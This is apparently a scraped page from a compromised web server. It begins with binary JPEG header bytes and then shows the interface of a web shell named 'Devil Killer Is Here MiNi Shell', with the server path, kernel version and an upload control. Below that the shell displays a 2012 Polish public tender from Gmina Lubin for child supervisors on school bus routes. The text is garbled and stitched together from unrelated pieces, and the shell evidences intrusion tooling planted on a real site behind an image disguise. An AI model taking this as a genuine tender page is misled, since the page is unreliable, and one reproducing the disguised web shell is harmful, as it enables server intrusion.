JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120817/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120817/304382-N-2012.html

<p class="kh_header"><b>Lubin: NABÓR PERSONELU DO OPIEKI NAD DZIEĆMI W CZASIE PRZEWOZÓW DO SZKÓŁ     I ODDZIAŁÓW PRZEDSZKOLNYCH PRZY SZKOŁACH PODSTAWOWYCH I PRZEDSZKOLU W OKRESIE OD WRZEŚNIA DO GRUDNIA 2012 ROKU</b><br>
<b>Numer ogłoszenia: 304382 - 2012; data zamieszczenia: 17.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Ekonomiczno-Administracyjny Szkół Gminy Lubin , Księginice 14, 59-300 Lubin, woj. dolnośląskie, tel. 076 840 81 52, faks 076 840 81 52.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka organizacyjna samorządu terytorialnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> NABÓR PERSONELU DO OPIEKI NAD DZIEĆMI W CZASIE PRZEWOZÓW DO SZKÓŁ     I ODDZIAŁÓW PRZEDSZKOLNYCH PRZY SZKOŁACH PODSTAWOWYCH I PRZEDSZKOLU W OKRESIE OD WRZEŚNIA DO GRUDNIA 2012 ROKU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opieka w czasie przewozu nad  uczniami dojeżdżającymi autobusami w ramach zorganizowanych dowozów uczniów  z  terenu Gminy Lubin do szkół podstawowych i gimnazjów położonych na terenie Gminy Lubin i Miasta Lubina oraz  oddziałów przedszkolnych przy szkołach podstawowych i przedszkolu w okresie od 3 września do 31 grudnia 2012 roku - rano i powrót. 

Dokładne godziny i trasy dowozów (relacje autobusów) zostaną podane opiekunom przed rozpoczęciem roku szkolnego.

Zamówienie jest podzielone na  14 części.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.31.21.10-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 14.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek, po złożeniu oświadczenia potwierdzającego spełnianie tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek, po złożeniu oświadczenia potwierdzającego spełnianie tego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek, po złożeniu oświadczenia potwierdzającego spełnianie tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek, po złożeniu oświadczenia potwierdzającego spełnianie tego warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek, po złożeniu oświadczenia potwierdzającego spełnianie tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy w zakresie wysokości wynagrodzenia ze względu na zmianę prawa podatkowego  powodującą zmianę obowiązującej stawki VAT na usługi objęte umową.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.ug-lubin.dolnyslask.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Ekonomiczno-Administracyjny Szkół Gminy Lubin 
59-300 Lubin 
Księginice 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.08.2012 godzina 10:00, miejsce: Zespół Ekonomiczno-Administracyjny Szkół Gminy Lubin 
59-300 Lubin 
Księginice 14 
pok. nr 116 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Nabór personelu do opieki w czasie przewozów uczniów do Szkoły Podstawowej im. Henryka Sienkiewicza w Siedlcach z siedzibą Siedlce 29, 59-300 Lubin i Gimnazjum nr 1 w Lubinie z siedzibą  - 59-300 Lubin, ul. Szpakowa 2 z miejscowości Księginice, Czerniec, Składowice, Ustronie, Dąbrowa Górna i Siedlce w okresie od września do grudnia 2012 roku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Planowane godziny rozpoczęcia tras - Lubin:  rano 7.00; Lubin: powrót 13.10 do 15.13.
Dokładne godziny i trasy dowozów (relacje autobusów) zostaną podane opiekunom przed rozpoczęciem roku szkolnego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.21.10-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Nabór personelu do opieki w czasie przewozów uczniów do Szkoły Podstawowej im. Henryka Sienkiewicza w Siedlcach z siedzibą Siedlce 29, 59-300 Lubin, Szkoły Podstawowej im. Marii Konopnickiej w Krzeczynie Wielkim z siedzibą 59-311 Lubin, Krzeczyn Wielki 9  i Gimnazjum nr 1        w Lubinie z siedzibą  - 59-300 Lubin, ul. Szpakowa 2 z miejscowości Składowice, Ustronie, Dąbrowa Górna, Siedlce Czerniec, Chróstnik, Gorzyca i Krzeczyn Mały  w okresie od września do grudnia      2012 roku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Planowane godziny rozpoczęcia tras - Lubin:  rano 6.40; Lubin: powrót 12.20 do 13.53.
Dokładne godziny i trasy dowozów (relacje autobusów) zostaną podane opiekunom przed rozpoczęciem roku szkolnego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.21.10-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Nabór personelu do opieki w czasie przewozów uczniów do Szkoły Podstawowej im. Henryka Sienkiewicza w Siedlcach z siedzibą Siedlce 29, 59-300 Lubin i Gimnazjum nr 1 w Lubinie z siedzibą  - 59-300 Lubin, ul. Szpakowa 2 z miejscowości Czerniec, Składowice, Ustronie, Dąbrowa Górna                      i Siedlce w okresie od września do grudnia 2012 roku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Planowane godziny rozpoczęcia tras - Lubin:  rano 6.45; Lubin: powrót 14.05 do 15.02.
Dokładne godziny i trasy dowozów (relacje autobusów) zostaną podane opiekunom przed rozpoczęciem roku szkolnego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.21.10-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Nabór personelu do opieki w czasie przewozów uczniów do Szkoły Podstawowej w Niemstowie       z siedzibą Niemstów 68, 59-323 Miłoradzice, Gimnazjum nr 1 w Lubinie z siedzibą  - 59-300 Lubin , ul. Szpakowa 2 i Szkoły Podstawowej w Raszówce z siedzibą 59-307 Raszówka ul. 1 Maja 10 z miejscowości Niemstów, Miłosna, Miłoradzice, Gogołowice, Karczowiska, Zimna Woda, Wiercień, Osiek i Kłopotów w okresie od września do grudnia 2012 roku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Planowane godziny rozpoczęcia tras - Lubin:  rano 6.25; Lubin: powrót 12.45 do 15.05.                                                                                                Dokładne godziny i trasy dowozów (relacje autobusów) zostaną podane opiekunom przed rozpoczęciem roku szkolnego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.21.10-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Nabór personelu do opieki w czasie przewozów uczniów do Szkoły Podstawowej im. Marii Konopnickiej w Krzeczynie Wielkim z siedzibą 59-311 Lubin, Krzeczyn Wielki 9 i Gimnazjum nr 4        w Lubinie z siedzibą 59-300 Lubin, ul. Marii Konopnickiej 5 z miejscowości Gorzyca, Krzeczyn Mały, Krzeczyn Wielki i Chróstnik w okresie od września do grudnia 2012 roku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Planowane godziny rozpoczęcia tras - Lubin:  rano 7.00, Lubin: powrót 13.40 do 14.47.
Dokładne godziny i trasy dowozów (relacje autobusów) zostaną podane opiekunom przed rozpoczęciem roku szkolnego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.21.10-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Nabór personelu do opieki w czasie przewozów uczniów do Gimnazjum nr 1 w Lubinie z siedzibą 59-300 Lubin, ul. Szpakowa 2, Zespołu Szkół Sportowych - Szkoła Podstawowa  nr 7 w Lubinie - ul. Sybiraków 11, Szkoły Podstawowej w Niemstowie Szkoła Filialna w Osieku z siedzibą Osiek, ul. Świętej Katarzyny 75,  Szkoły Podstawowej w Niemstowie z siedzibą Niemstów 68, 59-323 Miłoradzice,  oddz. przedszk. w Przedszkolu   w Raszówce z siedzibą 59-307 Raszówka, ul. Kolejowa 2 i do Szkoły Podst. w Raszówce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Planowane godziny rozpoczęcia tras - Lubin:  rano 6.35; Lubin: powrót 11.45 do 14.05.Dokładne godziny i trasy dowozów (relacje autobusów) zostaną podane opiekunom przed rozpoczęciem roku szkolnego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.21.10-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Nabór personelu do opieki w czasie przewozów uczniów do Szkoły Podstawowej w Szklarach Górnych z siedzibą Szklary Górne 48, 59-335 Lubin i Gimnazjum nr 4 w Lubinie z siedzibą 59-300 Lubin, ul. Marii Konopnickiej 5  z miejscowości Obora i Szklary Górne w okresie od września do grudnia      2012 roku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Planowane godziny rozpoczęcia tras - Lubin:  rano 7.30; Lubin: powrót 13.40 do 14.40.Dokładne godziny i trasy dowozów (relacje autobusów) zostaną podane opiekunom przed rozpoczęciem roku szkolnego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.21.10-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Nabór personelu do opieki w czasie przewozów uczniów do Gimn. nr 1 w Lubinie z siedz.  Lubin, ul. Szpakowa 2, Zespołu Szkół Sportowych - Szkoła Podstawowa  nr 7 w Lubinie - ul. Sybiraków 11, Szkoły Podst. w Niemstowie S F w Osieku z siedzibą Osiek, ul. Świętej Katarzyny 75,  oddziału przedszk. w Przedszkolu w Raszówce z siedzibą Raszówka, ul. Kolejowa 2 i do Szkoły Podstawowej w Raszówce z siedzibą  Raszówka ul. 1 Maja 10 z miejsc. Raszówka, Gorzelin, Raszowa, Pieszków i Osiek od IX do XII 2012.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Planowane godziny rozpoczęcia tras - Lubin:  rano 6.45; Lubin: powrót 13.40 do 14.30.Dokładne godziny i trasy dowozów (relacje autobusów) zostaną podane opiekunom przed rozpoczęciem roku szkolnego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.21.10-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Nabór personelu do opieki w czasie przewozów uczniów do Gimnazjum nr 1 w Lubinie z siedzibą     59-300 Lubin, ul. Szpakowa 2, Zespołu Szkół Sportowych - Szkoła Podstawowa  nr 7 w Lubinie - ul. Sybiraków 11, Szkoły Podstawowej w Raszówce z siedzibą 59-307 Raszówka ul. 1 Maja 10 i Punktu Przedszkolnego w Wiercieniu z siedziba Wiercień 37, 59-323 Miłoradzice z miejscowości Bukowna, Wierceń, Zimna Woda, Lisiec,  Karczowiska, Raszówka, Raszowa, Pieszków, Gorzelin i Osiek w okresie od IX do XII 2012 r.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Planowane godziny rozpoczęcia tras - Lubin:  rano 6.00; Lubin: powrót 14.35 do 16.19.Dokładne godziny i trasy dowozów (relacje autobusów) zostaną podane opiekunom przed rozpoczęciem roku szkolnego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.21.10-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Nabór personelu do opieki w czasie przewozów uczniów do Zespołu Szkół Sportowych - Szkoła Podstawowa nr 7 w Lubinie z siedzibą  59-300 Lubin ul. Sybiraków 11, Gimnazjum nr 1 w Lubinie        z siedzibą 59-300 Lubin, ul. Szpakowa 2 i Szkoły Podstawowej im. Marii Konopnickiej w Krzeczynie Wielkim z siedzibą 59-311 Lubin, Krzeczyn Wielki 9  z miejscowości Chróstnik w okresie od września do grudnia 2012 roku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Planowane godziny rozpoczęcia tras - Lubin:  rano 7.00; Lubin: powrót 13.05 do 14.55.Dokładne godziny i trasy dowozów (relacje autobusów) zostaną podane opiekunom przed rozpoczęciem roku szkolnego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.21.10-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Nabór personelu do opieki w czasie przewozów uczniów do Zespołu Szkół Sportowych - Szkoła Podstawowa nr 7 w Lubinie z siedzibą  59-300 Lubin ul. Sybiraków 11 i Gimnazjum nr 1 w Lubinie        z siedzibą 59-300 Lubin, ul. Szpakowa 2 z miejscowości Miroszowice i Gola w okresie od września do grudnia 2012 roku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Planowane godziny rozpoczęcia tras - Lubin:  rano 7.05; Lubin: powrót 14.35 do 14.50.Dokładne godziny i trasy dowozów (relacje autobusów) zostaną podane opiekunom przed rozpoczęciem roku szkolnego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.21.10-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Nabór personelu do opieki w czasie przewozów uczniów do Szkoły Podstawowej w Raszówce                 z siedzibą 59-307 Raszówka ul. 1 Maja 10, Szkoły Podstawowej w Niemstowie z siedzibą Niemstów 68, 59-323 Miłoradzice i Gimnazjum nr 1 w Lubinie z siedzibą 59-300 Lubin, ul. Szpakowa 2                    z miejscowości Osiek, Kłopotów, Pieszków, Raszowa Mała, Miłoradzice, Gogołowice, Miłosna Niemstów, Buczynka w okresie od września do grudnia 2012 roku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Planowane godziny rozpoczęcia tras - Lubin:  rano 6.30, Lubin: powrót 14.30 do 15.45.Dokładne godziny i trasy dowozów (relacje autobusów) zostaną podane opiekunom przed rozpoczęciem roku szkolnego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.21.10-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
